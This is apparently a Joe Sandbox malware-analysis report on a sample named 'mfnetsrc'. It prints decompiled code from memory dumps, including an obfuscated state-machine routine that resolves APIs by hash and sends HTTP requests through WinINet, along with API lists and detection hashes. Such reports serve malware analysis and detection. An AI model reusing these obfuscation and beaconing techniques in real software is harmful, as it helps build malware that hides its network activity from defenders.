0x02aa53f2
0x02aa53f7
0x02aa53f7
0x02aa5401
0x02aa5403
0x00000000
0x02aa5393
0x02aa5398
0x00000000
0x02aa539e
0x02aa539e
0x02aa53a3
0x02aa53ad
0x02aa53c0
0x02aa53c5
0x02aa53c5
0x02aa53cf
0x02aa53d1
0x00000000
0x02aa53d1
0x02aa5398
0x02aa5391
0x02aa5386
0x00000000
0x02aa537b
0x02aa5426
0x02aa5474
0x02aa5476
0x00000000
0x02aa5428
0x02aa542d
0x02aa545c
0x00000000
0x02aa542f
0x02aa5434
0x00000000
0x02aa5436
0x02aa543b
0x02aa543d
0x00000000
0x02aa543d
0x02aa5434
0x02aa542d
0x00000000
0x02aa5447
0x02aa5447
0x02aa545b
0x00000000

APIs

GetNativeSystemInfo.KERNELBASE(2564BE4F,2564BE4F), ref: 02AA5401

Strings

Ei, xrefs: 02AA53AF

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: Ei
API String ID: 1721193555-3988083245
Opcode ID: ff73a6f7eff55b36664b5ef6e740212c3903e35f040539daa9a08872f661a79e
Instruction ID: ad343735d3ec51fd7ce38dd5cdb571f396e2d778bd8593715e83b2c5cc6e4908
Opcode Fuzzy Hash: ff73a6f7eff55b36664b5ef6e740212c3903e35f040539daa9a08872f661a79e
Instruction Fuzzy Hash: C321F871E1421047CA24976884F42BFA7E15FD4388FC4496AE48ADB250EF64C9008F96

Uniqueness

Uniqueness Score: -1.00%

Function 0040A274, Relevance: 16.6, APIs: 11, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t61;

				_t57 = _t58;
				_push(0xffffffff);
				_push(0x40c000);
				_push(0x40a424);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				 *((intOrPtr*)(_t57 - 0x18)) = _t58 - 0x68;
				 *((intOrPtr*)(_t57 - 4)) = 0;
				__set_app_type(2);
				 *0xc1da4c =  *0xc1da4c | 0xffffffff;
				 *0xc1da5c =  *0xc1da5c | 0xffffffff;
				 *(__p__fmode()) =  *0xc1da3c;
				 *(__p__commode()) =  *0xc1da38;
				 *0xc1da40 = _adjust_fdiv;
				_t27 = E0040A411( *_adjust_fdiv);
				_t61 =  *0x40da00; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040A40E);
				}
				E0040A3F6(_t27);
				_push(0x40d418);
				_push(0x40d314);
				L0040A3F0();
				 *(_t57 - 0x6c) =  *0xc1da34;
				__getmainargs(_t57 - 0x60, _t57 - 0x70, _t57 - 0x64,  *0xc1da30, _t57 - 0x6c);
				_push(0x40d210);
				_push(0x40d000); // executed
				L0040A3F0(); // executed
				_t55 =  *_acmdln;
				 *((intOrPtr*)(_t57 - 0x74)) = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						 *((intOrPtr*)(_t57 - 0x74)) = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						 *((intOrPtr*)(_t57 - 0x74)) = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						 *((intOrPtr*)(_t57 - 0x74)) = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				 *(_t57 - 0x30) = 0;
				GetStartupInfoA(_t57 - 0x5c);
				if(( *(_t57 - 0x30) & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 =  *(_t57 - 0x2c) & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_t40 = L00401154(GetModuleHandleA(0), 0); // executed
				 *(_t57 - 0x68) = _t40;
				exit(_t40);
				_t41 =  *((intOrPtr*)(_t57 - 0x14));
				_t49 =  *((intOrPtr*)( *_t41));
				 *((intOrPtr*)(_t57 - 0x78)) = _t49;
				_push(_t41);
				_push(_t49);
				L0040A3DE();
				return _t41;
			}

APIs

__set_app_type.MSVCRT ref: 0040A2A1
__p__fmode.MSVCRT ref: 0040A2B6
__p__commode.MSVCRT ref: 0040A2C4
__setusermatherr.MSVCRT ref: 0040A2F0
_initterm.MSVCRT ref: 0040A306
__getmainargs.MSVCRT ref: 0040A329
_initterm.MSVCRT ref: 0040A339
GetStartupInfoA.KERNEL32(?), ref: 0040A378
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040A39C
exit.MSVCRT ref: 0040A3AC
_XcptFilter.MSVCRT ref: 0040A3BE

Memory Dump Source

Source File: 00000003.00000002.640071568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.640036252.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.640177297.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.640287260.0000000000C1E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.640316808.0000000000C20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.640637212.0000000000C62000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_mfnetsrc.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 551dc8b2af765491c33ea83df1cd4efc949063384e421c326e445c2222268828
Instruction ID: 40e8669a72c36f2df577adfdbff53e7502eb4e8cd4a7900511b47e5e9f80bdbe
Opcode Fuzzy Hash: 551dc8b2af765491c33ea83df1cd4efc949063384e421c326e445c2222268828
Instruction Fuzzy Hash: EB417C75844344EFDB20DFA4DC45BAE7BB8FB0A714F24812BE842A72D1D7784850DB16

Uniqueness

Uniqueness Score: -1.00%

Function 02AA2C20, Relevance: 7.8, APIs: 5, Instructions: 287
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E02AA2C20(void* __ecx, void* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t47;
				signed int _t51;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t65;
				void* _t66;
				WCHAR* _t68;
				void* _t83;
				void* _t87;
				void* _t132;
				void* _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				WCHAR* _t140;
				long _t142;
				void* _t146;
				void* _t147;
				void* _t150;
				void* _t151;

				_t146 =  *(_t147 + 0x3c);
				 *(_t147 + 0x30) = __ecx;
				_t136 = 0x21ed7693;
				_t83 =  *(_t147 + 0x30);
				 *(_t147 + 0x30) = __edx;
				 *(_t147 + 0x14) = 0;
				 *(_t147 + 0x24) = 0;
				 *(_t147 + 0x20) = 0;
				 *(_t147 + 0x10) = 0;
				while(1) {
					L1:
					_t132 =  *(_t147 + 0x18);
					while(1) {
						L2:
						_t150 = _t136 - 0xdefb712;
						if(_t150 > 0) {
							goto L36;
						}
						L3:
						if(_t150 == 0) {
							__eflags =  *0x2aae12c;
							if( *0x2aae12c == 0) {
								 *0x2aae12c = E02AA3E80(_t83, E02AA3F20(0x2ba535f4), 0xc71f7f57, _t146);
							}
							_t36 = InternetOpenW( *(_t147 + 0x24), 0, 0, 0, 0); // executed
							__eflags = _t36;
							 *(_t147 + 0x1c) = _t36;
							_t136 =  !=  ? 0x2a5ea3fb : 0xe955358;
							_t38 =  *0x2aadea8;
							__eflags = _t38;
							if(_t38 == 0) {
								_t38 = E02AA3E80(_t83, E02AA3F20(0xbb398380), 0x97f883e, _t146);
								 *0x2aadea8 = _t38;
							}
							_t133 =  *_t38();
							_t40 =  *0x2aae1a0;
							__eflags = _t40;
							if(_t40 == 0) {
								_t40 = E02AA3E80(_t83, E02AA3F20(0xbb398380), 0x26c3f343, _t146);
								 *0x2aae1a0 = _t40;
							}
							 *_t40(_t133, 0,  *(_t147 + 0x14));
							goto L34;
						} else {
							_t151 = _t136 - 0x67ae942;
							if(_t151 > 0) {
								__eflags = _t136 - 0x6b479f3;
								if(_t136 == 0x6b479f3) {
									__eflags =  *0x2aae128;
									if( *0x2aae128 == 0) {
										 *0x2aae128 = E02AA3E80(_t83, E02AA3F20(0x2ba535f4), 0x6972c784, _t146);
									}
									InternetCloseHandle(_t83); // executed
									_t136 = 0x12dff647;
									continue;
								} else {
									__eflags = _t136 - 0x8581448;
									if(_t136 != 0x8581448) {
										goto L34;
									} else {
										__eflags = _t146;
										if(_t146 == 0) {
											_t140 =  *(_t147 + 0x20);
										} else {
											_t140 = E02AA34C0(0x2aad1f0);
											 *(_t147 + 0x20) = _t140;
										}
										_t52 =  *0x2aae1cc;
										__eflags = _t52;
										if(_t52 == 0) {
											_t52 = E02AA3E80(_t83, E02AA3F20(0x2ba535f4), 0xc136cec1, _t146);
											 *0x2aae1cc = _t52;
										}
										_t83 =  *_t52(_t132, _t140,  *((intOrPtr*)(_t147 + 0x50)), 0, 0, 0, 0x844cc300, 0);
										E02AA3460(_t140);
										__eflags = _t83;
										_t136 =  !=  ? 0x4e6dd92 : 0x12dff647;
										continue;
									}
								}
							} else {
								if(_t151 == 0) {
									__eflags = E02AA29B0(_t83,  *((intOrPtr*)(_t147 + 0x48)));
									_t87 =  !=  ? 1 :  *(_t147 + 0x10);
									__eflags = _t87;
									 *(_t147 + 0x10) = _t87;
									L15:
									_t136 = 0x6b479f3;
									continue;
								} else {
									if(_t136 == 0x1e6c40f) {
										_t47 =  *0x2aae128;
										__eflags = _t47;
										if(_t47 == 0) {
											_t47 = E02AA3E80(_t83, E02AA3F20(0x2ba535f4), 0x6972c784, _t146);
											 *0x2aae128 = _t47;
										}
										 *_t47( *(_t147 + 0x1c));
									} else {
										if(_t136 != 0x4e6dd92) {
											L34:
											__eflags = _t136 - 0xe955358;
											if(_t136 != 0xe955358) {
												goto L1;
											}
										} else {
											if(_t146 == 0) {
												_t142 = 0;
												_t135 = 0;
												__eflags = 0;
											} else {
												_t142 =  *(_t146 + 4);
												_t135 =  *_t146;
											}
											if( *0x2aae20c == 0) {
												 *0x2aae20c = E02AA3E80(_t83, E02AA3F20(0x2ba535f4), 0x182fe063, _t146);
											}
											_t51 = HttpSendRequestW(_t83,  *(_t147 + 0x4c), 0xffffffff, _t135, _t142); // executed
											asm("sbb esi, esi");
											_t136 = ( ~_t51 & 0x1a4d9a07) + 0x6b479f3;
											while(1) {
												L1:
												_t132 =  *(_t147 + 0x18);
												while(1) {
													L2:
													_t150 = _t136 - 0xdefb712;
													if(_t150 > 0) {
														goto L36;
													}
													goto L3;
												}
												goto L36;
											}
										}
									}
								}
							}
						}
						L64:
						return  *(_t147 + 0x10);
						L65:
						L36:
						__eflags = _t136 - 0x210213fa;
						if(__eflags > 0) {
							__eflags = _t136 - 0x21ed7693;
							if(_t136 == 0x21ed7693) {
								_t136 = 0x1e47f06d;
								continue;
							} else {
								__eflags = _t136 - 0x2a5ea3fb;
								if(_t136 != 0x2a5ea3fb) {
									goto L34;
								} else {
									__eflags =  *0x2aae178;
									if( *0x2aae178 == 0) {
										 *0x2aae178 = E02AA3E80(_t83, E02AA3F20(0x2ba535f4), 0x48c489b5, _t146);
									}
									_t58 = InternetConnectW( *(_t147 + 0x38),  *(_t147 + 0x4c),  *(_t147 + 0x44), 0, 0, 3, 0, 0); // executed
									_t132 = _t58;
									__eflags = _t132;
									 *(_t147 + 0x18) = _t132;
									_t136 =  !=  ? 0x8581448 : 0x1e6c40f;
									continue;
								}
							}
						} else {
							if(__eflags == 0) {
								_t60 =  *0x2aadde8; // 0x0
								 *((intOrPtr*)(_t147 + 0x28)) = 4;
								__eflags = _t60;
								if(_t60 == 0) {
									_t60 = E02AA3E80(_t83, E02AA3F20(0x2ba535f4), 0x46124712, _t146);
									 *0x2aadde8 = _t60;
								}
								_t61 =  *_t60(_t83, 0x20000013, _t147 + 0x34, _t147 + 0x2c, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L15;
								} else {
									__eflags =  *((intOrPtr*)(_t147 + 0x2c)) - 0xc8;
									if( *((intOrPtr*)(_t147 + 0x2c)) != 0xc8) {
										goto L15;
									} else {
										_t136 = 0x67ae942;
										continue;
									}
								}
								goto L65;
							} else {
								__eflags = _t136 - 0x12dff647;
								if(_t136 == 0x12dff647) {
									_t62 =  *0x2aae128;
									__eflags = _t62;
									if(_t62 == 0) {
										_t62 = E02AA3E80(_t83, E02AA3F20(0x2ba535f4), 0x6972c784, _t146);
										 *0x2aae128 = _t62;
									}
									 *_t62(_t132);
									_t136 = 0x1e6c40f;
									continue;
								} else {
									__eflags = _t136 - 0x1e47f06d;
									if(_t136 != 0x1e47f06d) {
										goto L34;
									} else {
										 *(_t147 + 0x24) = 0x200;
										_t138 = E02AA42F0(_t83, 0x200);
										__eflags = _t138;
										if(_t138 != 0) {
											_t65 =  *0x2aadbf0;
											__eflags = _t65;
											if(_t65 == 0) {
												_t65 = E02AA3E80(_t83, E02AA3F20(0x50c9f0c1), 0xd16bf1bd, _t146);
												 *0x2aadbf0 = _t65;
											}
											_t66 =  *_t65(0, _t138, _t147 + 0x24); // executed
											__eflags = _t66;
											if(_t66 == 0) {
												_t68 = E02AA56A0(_t138, _t146);
												_t147 = _t147 - 8 + 8;
												 *(_t147 + 0x14) = _t68;
											}
											E02AA4250(_t83, _t138);
										}
										_t136 = 0xdefb712;
										continue;
									}
								}
							}
						}
						goto L64;
					}
				}
			}

0x02aa2c25
0x02aa2c2c
0x02aa2c30
0x02aa2c35
0x02aa2c3a
0x02aa2c3e
0x02aa2c46
0x02aa2c4e
0x02aa2c56
0x02aa2c5a
0x02aa2c5a
0x02aa2c5a
0x02aa2c60
0x02aa2c60
0x02aa2c60
0x02aa2c66
0x00000000
0x00000000
0x02aa2c6c
0x02aa2c6c
0x02aa2dcf
0x02aa2dd1
0x02aa2de9
0x02aa2de9
0x02aa2dfa
0x02aa2dfc
0x02aa2dfe
0x02aa2e0c
0x02aa2e0f
0x02aa2e14
0x02aa2e16
0x02aa2e29
0x02aa2e2e
0x02aa2e2e
0x02aa2e35
0x02aa2e37
0x02aa2e3c
0x02aa2e3e
0x02aa2e51
0x02aa2e56
0x02aa2e56
0x02aa2e62
0x00000000
0x02aa2c72
0x02aa2c72
0x02aa2c78
0x02aa2d15
0x02aa2d1b
0x02aa2d9e
0x02aa2da0
0x02aa2db8
0x02aa2db8
0x02aa2dbe
0x02aa2dc0
0x00000000
0x02aa2d1d
0x02aa2d1d
0x02aa2d23
0x00000000
0x02aa2d29
0x02aa2d29
0x02aa2d2b
0x02aa2d3f
0x02aa2d2d
0x02aa2d37
0x02aa2d39
0x02aa2d39
0x02aa2d43
0x02aa2d48
0x02aa2d4a
0x02aa2d5d
0x02aa2d62
0x02aa2d62
0x02aa2d7e
0x02aa2d80
0x02aa2d85
0x02aa2d91
0x00000000
0x02aa2d91
0x02aa2d23
0x02aa2c7e
0x02aa2c7e
0x02aa2cfd
0x02aa2d04
0x02aa2d04
0x02aa2d07
0x02aa2d0b
0x02aa2d0b
0x00000000
0x02aa2c80
0x02aa2c86
0x02aa3008
0x02aa300d
0x02aa300f
0x02aa3022
0x02aa3027
0x02aa3027
0x02aa3030
0x02aa2c8c
0x02aa2c92
0x02aa2e64
0x02aa2e64
0x02aa2e6a
0x00000000
0x02aa2e70
0x02aa2c98
0x02aa2c9a
0x02aa2ca4
0x02aa2ca6
0x02aa2ca6
0x02aa2c9c
0x02aa2c9c
0x02aa2c9f
0x02aa2c9f
0x02aa2caf
0x02aa2cc7
0x02aa2cc7
0x02aa2cd5
0x02aa2cdb
0x02aa2ce3
0x02aa2c5a
0x02aa2c5a
0x02aa2c5a
0x02aa2c60
0x02aa2c60
0x02aa2c60
0x02aa2c66
0x00000000
0x00000000
0x00000000
0x02aa2c66
0x00000000
0x02aa2c60
0x02aa2c5a
0x02aa2c92
0x02aa2c86
0x02aa2c7e
0x02aa2c78
0x02aa3032
0x02aa303d
0x00000000
0x02aa2e75
0x02aa2e75
0x02aa2e7b
0x02aa2f94
0x02aa2f9a
0x02aa2ffe
0x00000000
0x02aa2f9c
0x02aa2f9c
0x02aa2fa2
0x00000000
0x02aa2fa8
0x02aa2fad
0x02aa2faf
0x02aa2fc7
0x02aa2fc7
0x02aa2fe2
0x02aa2fe4
0x02aa2feb
0x02aa2fed
0x02aa2ff6
0x00000000
0x02aa2ff6
0x02aa2fa2
0x02aa2e81
0x02aa2e81
0x02aa2f34
0x02aa2f39
0x02aa2f41
0x02aa2f43
0x02aa2f56
0x02aa2f5b
0x02aa2f5b
0x02aa2f72
0x02aa2f74
0x02aa2f76
0x00000000
0x02aa2f7c
0x02aa2f7c
0x02aa2f84
0x00000000
0x02aa2f8a
0x02aa2f8a
0x00000000
0x02aa2f8a
0x02aa2f84
0x00000000
0x02aa2e87
0x02aa2e87
0x02aa2e8d
0x02aa2f03
0x02aa2f08
0x02aa2f0a
0x02aa2f1d
0x02aa2f22
0x02aa2f22
0x02aa2f28
0x02aa2f2a
0x00000000
0x02aa2e8f
0x02aa2e8f
0x02aa2e95
0x00000000
0x02aa2e97
0x02aa2e9c
0x02aa2ea9
0x02aa2eab
0x02aa2ead
0x02aa2eaf
0x02aa2eb4
0x02aa2eb6
0x02aa2ec9
0x02aa2ece
0x02aa2ece
0x02aa2edb
0x02aa2edd
0x02aa2edf
0x02aa2ee6
0x02aa2eeb
0x02aa2eee
0x02aa2eee
0x02aa2ef4
0x02aa2ef4
0x02aa2ef9
0x00000000
0x02aa2ef9
0x02aa2e95
0x02aa2e8d
0x02aa2e81
0x00000000
0x02aa2e7b
0x02aa2c60

APIs

HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 02AA2CD5
InternetCloseHandle.WININET(?), ref: 02AA2DBE
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02AA2DFA
ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 02AA2EDB
InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02AA2FE2

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
String ID:
API String ID: 1741791824-0
Opcode ID: 14321a8a10cf7bbf252150dc8fd5facdb9085dc6c68d71dfd90c0711294e4513
Instruction ID: 997c9d201f908978ecd298efd78ac79ed3df0b8a0dfc17e3d71357facc34e089
Opcode Fuzzy Hash: 14321a8a10cf7bbf252150dc8fd5facdb9085dc6c68d71dfd90c0711294e4513
Instruction Fuzzy Hash: E9A1C072E443129BDB24AB649DA072FB6E6AFC4704F000969ED55EB340EF70CD218BC2

Uniqueness

Uniqueness Score: -1.00%

Function 02AA30D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E02AA30D0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t52;
				intOrPtr* _t68;
				void* _t71;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t85;
				intOrPtr* _t90;
				signed int _t95;
				void* _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				void* _t104;

				_t76 =  *((intOrPtr*)(_t103 + 0xc));
				_t52 = 0x22788346;
				_t102 =  *(_t103 + 0x10);
				_t100 =  *(_t103 + 0x14);
				_t95 =  *(_t103 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t104 = _t52 - 0xec2173f;
							if(_t104 <= 0) {
								break;
							}
							if(_t52 == 0x22788346) {
								 *(_t103 + 0x10) = 0x3d53;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
								 *(_t103 + 0x18) = 0xed42;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
								_t52 = 0x27153269;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
								continue;
							} else {
								if(_t52 == 0x27153269) {
									_t85 =  *0x2aaddd0;
									if(_t85 == 0) {
										_t85 = E02AA3E80(_t76, E02AA3F20(0x7539f5a2), 0xf789cbad, _t102);
										 *0x2aaddd0 = _t85;
									}
									_t95 =  *_t85(_t102 + 0x2c);
									_t52 = 0xb58c94f;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t52 != 0x302165a1) {
										goto L20;
									} else {
										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
										continue;
									}
								}
							}
							L30:
						}
						if(_t104 == 0) {
							if(_t76 !=  *(_t103 + 0x10)) {
								goto L29;
							} else {
								_t52 = 0x7338f4f;
								goto L2;
							}
						} else {
							if(_t52 == 0x26fef4f) {
								_t90 =  *0x2aae25c;
								if(_t90 == 0) {
									_t90 = E02AA3E80(_t76, E02AA3F20(0xbb398380), 0x5b27858b, _t102);
									 *0x2aae25c = _t90;
								}
								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
								 *(_t77 + 0x1c) = _t100;
								goto L29;
							} else {
								if(_t52 == 0x7338f4f) {
									_t68 =  *0x2aadea8;
									if(_t68 == 0) {
										_t68 = E02AA3E80(_t76, E02AA3F20(0xbb398380), 0x97f883e, _t102);
										 *0x2aadea8 = _t68;
									}
									_t101 =  *_t68();
									if( *0x2aadcec == 0) {
										 *0x2aadcec = E02AA3E80(_t76, E02AA3F20(0xbb398380), 0xe9233692, _t102);
									}
									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
									_t100 = _t71;
									if(_t100 == 0) {
										L29:
										return 1;
									} else {
										_t52 = 0x26fef4f;
										goto L1;
									}
								} else {
									if(_t52 != 0xb58c94f) {
										goto L20;
									} else {
										_t76 = E02AA3D10(_t95);
										_t52 = 0x302165a1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L30;
						L20:
					} while (_t52 != 0x2c4ed872);
					return 1;
					goto L30;
				}
			}

0x02aa30d2
0x02aa30d6
0x02aa30dc
0x02aa30e1
0x02aa30e6
0x02aa30ea
0x02aa30ea
0x02aa30f0
0x02aa30f0
0x02aa30f0
0x02aa30f0
0x02aa30f5
0x00000000
0x00000000
0x02aa31b1
0x02aa3226
0x02aa322e
0x02aa3233
0x02aa323b
0x02aa3240
0x02aa3248
0x02aa324d
0x02aa3255
0x02aa325a
0x02aa3262
0x02aa326a
0x02aa326f
0x02aa327c
0x02aa3280
0x02aa3285
0x02aa328d
0x02aa3292
0x02aa329f
0x02aa32a3
0x02aa32a8
0x00000000
0x02aa31b3
0x02aa31b8
0x02aa31ec
0x02aa31f4
0x02aa320c
0x02aa320e
0x02aa320e
0x02aa321a
0x02aa321c
0x02aa30ea
0x02aa30ea
0x00000000
0x02aa30ea
0x02aa31ba
0x02aa31bf
0x00000000
0x02aa31c1
0x02aa31cc
0x00000000
0x02aa31cc
0x02aa31bf
0x02aa31b8
0x00000000
0x02aa31b1
0x02aa30fb
0x02aa319c
0x00000000
0x02aa31a2
0x02aa31a2
0x00000000
0x02aa31a2
0x02aa3101
0x02aa3106
0x02aa32b5
0x02aa32bd
0x02aa32d5
0x02aa32d7
0x02aa32d7
0x02aa32ee
0x02aa32f0
0x02aa32f7
0x02aa32fd
0x02aa3300
0x00000000
0x02aa310c
0x02aa3111
0x02aa312e
0x02aa3135
0x02aa3148
0x02aa314d
0x02aa314d
0x02aa3154
0x02aa315d
0x02aa3175
0x02aa3175
0x02aa3182
0x02aa3184
0x02aa3188
0x02aa3306
0x02aa330d
0x02aa318e
0x02aa318e
0x00000000
0x02aa318e
0x02aa3113
0x02aa3118
0x00000000
0x02aa311e
0x02aa3125
0x02aa3127
0x02aa30ea
0x02aa30ea
0x00000000
0x02aa30ea
0x02aa30ea
0x02aa3118
0x02aa3111
0x02aa3106
0x00000000
0x02aa31d4
0x02aa31d4
0x02aa31e9
0x00000000
0x02aa31e9

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02AA3182

Strings

B, xrefs: 02AA3262
&, xrefs: 02AA328D
S=, xrefs: 02AA3226

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &$B$S=
API String ID: 1279760036-3580750612
Opcode ID: df25ae5517120926290207b6a611cde7b1fa76e73c925e6c864b0cac10ac7708
Instruction ID: 5a665477f6a6cb01d95591a8dad4ff90fc0232703dbf637ccab94819568333e4
Opcode Fuzzy Hash: df25ae5517120926290207b6a611cde7b1fa76e73c925e6c864b0cac10ac7708
Instruction Fuzzy Hash: 8251A471A083029BCF28DF6495E552EB7E6FFD4344F10489EE085CB210DF70D94A8B92

Uniqueness

Uniqueness Score: -1.00%

Function 02AA9C10, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E02AA9C10(void* __ebp) {
				short _v520;
				short _v1040;
				char _v1044;
				void* __ebx;
				void* _t7;
				intOrPtr* _t9;
				intOrPtr* _t43;
				void* _t46;
				void* _t49;

				_t46 = __ebp;
				_t7 = 0x2c176d24;
				goto L1;
				do {
					while(1) {
						L1:
						_t49 = _t7 - 0x2c176d24;
						if(_t49 > 0) {
							break;
						}
						if(_t49 == 0) {
							_t7 = 0x2ca09120;
							continue;
						} else {
							if(_t7 == 0x17e35087) {
								_v1044 = 0x104;
								if( *0x2aaded0 == 0) {
									 *0x2aaded0 = E02AA3E80(0, E02AA3F20(0xbb398380), 0x23563937, _t46);
								}
								_t43 =  *0x2aadf2c;
								if(_t43 == 0) {
									_t43 = E02AA3E80(0, E02AA3F20(0xbb398380), 0xd0ee7032, _t46);
									 *0x2aadf2c = _t43;
								}
								 *_t43(GetCurrentProcess(), 0,  &_v1040,  &_v1044); // executed
								_t7 = 0x2c13ef60;
								continue;
							} else {
								if(_t7 == 0x2c13ef60) {
									if( *0x2aadd80 == 0) {
										 *0x2aadd80 = E02AA3E80(0, E02AA3F20(0xbb398380), 0xcb2f8494, _t46);
									}
									lstrcmpiW( &_v520,  &_v1040); // executed
									_t26 =  !=  ? 1 : 0;
									_t22 =  !=  ? 1 : 0;
									return  !=  ? 1 : 0;
								} else {
									goto L5;
								}
							}
						}
						L20:
					}
					if(_t7 != 0x2ca09120) {
						goto L5;
					} else {
						_t9 =  *0x2aade58;
						if(_t9 == 0) {
							_t9 = E02AA3E80(0, E02AA3F20(0xbb398380), 0xb1aefb5, _t46);
							 *0x2aade58 = _t9;
						}
						 *_t9(0,  &_v520, 0x104);
						_t7 = 0x17e35087;
						goto L1;
					}
					goto L20;
					L5:
				} while (_t7 != 0x3e45350);
				return 0;
				goto L20;
			}

0x02aa9c10
0x02aa9c16
0x02aa9c1e
0x02aa9c20
0x02aa9c20
0x02aa9c20
0x02aa9c20
0x02aa9c25
0x00000000
0x00000000
0x02aa9c2b
0x02aa9cc9
